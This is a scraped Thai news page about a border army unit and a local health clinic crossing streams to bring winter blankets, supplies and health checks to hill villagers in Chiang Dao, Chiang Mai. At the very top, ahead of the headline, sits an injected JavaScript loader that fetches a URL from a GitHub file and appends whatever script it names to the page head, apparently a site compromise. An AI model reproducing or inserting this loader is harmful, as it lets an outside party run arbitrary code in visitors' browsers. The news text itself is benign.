;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); เชียงใหม่ กองกำลังผาเมือง พร้อม รพ.สต.นาหวาย นั่งรถข้ามลำห้วย ให้ผ้าห่มกันหนาว ดูแลสุขภาพ เด็กๆ คนดอย ที่อ.เชียงดาว - ThaiReference | อาสาไทยยืนยัน
เชียงใหม่ กองกำลังผาเมือง พร้อม รพ.สต.นาหวาย นั่งรถข้ามลำห้วย ให้ผ้าห่มกันหนาว ดูแลสุขภาพ เด็กๆ คนดอย ที่อ.เชียงดาว

ท่ามกลางโลกปัจจุบันที่วุ่นวาย การเปลี่ยนแปลงเกิดขึ้นทุกวัน เช่นเดียวกับคุณภาพชีวิตของคนในสังคม ยังคงต้องการความช่วยเหลือเติมเต็มสิ่งที่ขาดไป เด็กๆ ชาวบ้าน  ในพื้นที่บนดอยสูงยังต้องการโอกาส และความช่วยเหลืออยู่อีกมาก

โดยเฉพาะในพื้นที่ที่สูงและห่างไกลอย่างของอำเภอเชียงดาว จังหวัดเชียงใหม่  ซึ่งลักษณะของพื้นที่แห่งนี้ บางชุมชนหมู่บ้านตั้งอยู่กลางป่าและหุบเขา  ถนนก็เป็นดินโคลน  ที่มีเงื่อนไขหลายประการอันเป็นอุปสรรคต่อการเดินทาง ทั้งเรื่องระยะทางไกลจากตัวเมือง  เส้นทางเข้าชุมชนยังลำบาก แต่ด้วยความหวังที่ว่า ต้องช่วยสร้างคุณภาพชีวิตที่ดีให้กับเด็กๆ ประชาชน ในทุกพื้นที่ของประเทศไทย ไม่ว่าจะบนดอยสูง หรือที่ราบต่ำ ในหมู่บ้านอันห่างไกล หรือท้องถิ่นด้อยโอกาสที่แม้อยู่ใกล้แต่โอกาสกลับไปไม่ถึง ไม่ว่าที่ไหนการให้ก็ยังเป็นสิ่งสำคัญเสมอ

โดย เมื่อวันที่ 23 พฤศจิกายน 2568 กองบังคับการผาดง หน่วยเฉพาะกิจไชยานุภาพ กองกำลังผาเมือง จัดกำลังพลจิตอาสาพระราชทาน พร้อมด้วยเจ้าหน้าที่เสนารักษ์ หรือ หมอทหาร ร่วมกับ โรงพยาบาลส่งเสริมสุขภาพตำบลนาหวาย จัดกิจกรรม “Army & Hotpital Delivery” เพื่อแบ่งปันเฉลี่ยทุกข์ เฉลี่ยสุข กับ โรงพยาบาลส่งเสริมสุขภาพตำบลนาหวาย ในการดูแลช่วยเหลือผู้มีภาวะพึ่งพิง ผู้ป่วยติดเตียง ในพื้นที่ห่างไกลทุรกันดาร โดยการลงพื้นที่ร่วมกันเยี่ยมเยือนให้กำลังใจ มอบสิ่งของอุปโภค – บริโภค  รวมถึงให้บริการตรวจสุขภาพ และมอบเสื้อกันหนาวให้ถึงที่หน้าบ้าน เพื่อเป็นการสร้างความสัมพันธ์อันดีระหว่างเจ้าหน้าที่ทหาร กับหน่วยงานรัฐ  และประชาชน ในพื้นที่ ตำบลเมืองนะ อำเภอเชียงดาว จังหวัดเชียงใหม่

ซึ่งการเดินทาง หน่วยเฉพาะกิจไชยานุภาพ จัดรถทหารสำหรับขับเคลื่อนในเส้นทางที่มีความยากลำบาก ข้ามผ่านลำห้วย  ยอดดอยสูงชันสุดชายแดนเหนือ ก่อนเข้าไปถึงพื้นที่ตำบลเมืองนะ อำเภอเชียงดาว จังหวัดเชียงใหม่ มีประชาชนหลายครอบครัวหมู่บ้านอาศัยอยู่ในพื้นที่ที่ห่างไกลความเจริญเป็นอย่างมาก ตั้งอยู่ใจกลางหุบเขา เพียงหวังให้เด็กและชาวดอยมีคุณภาพชีวิตดีกว่าเดิม ด้วยแนวคิด ‘ แบ่งปันเฉลี่ยทุกข์ เฉลี่ยสุข การให้ที่ส่งต่อให้กันได้ ‘  สัมผัสความหมายชีวิต เติมฝันให้คนดอย “การให้และแบ่งปัน” นอกจากจะก่อให้เกิดความสุขและอิ่มเอมใจแล้ว การรู้จักเป็นผู้ให้จะช่วยพัฒนาให้เกิดการคิดบวกเห็นอกเห็นใจผู้อื่นและมองเห็นคุณค่าของเพื่อนมนุษย์ด้วยกัน สร้างความสามัคคี นำมาสู่ความอบอุ่นใจ ความมั่นคง และความสุขของคนในสังคม

https://www.tiktok.com/@chaijexu/video/7575922333098183944?is_from_webapp=1&sender_device=pc&web_id=7551579084104238610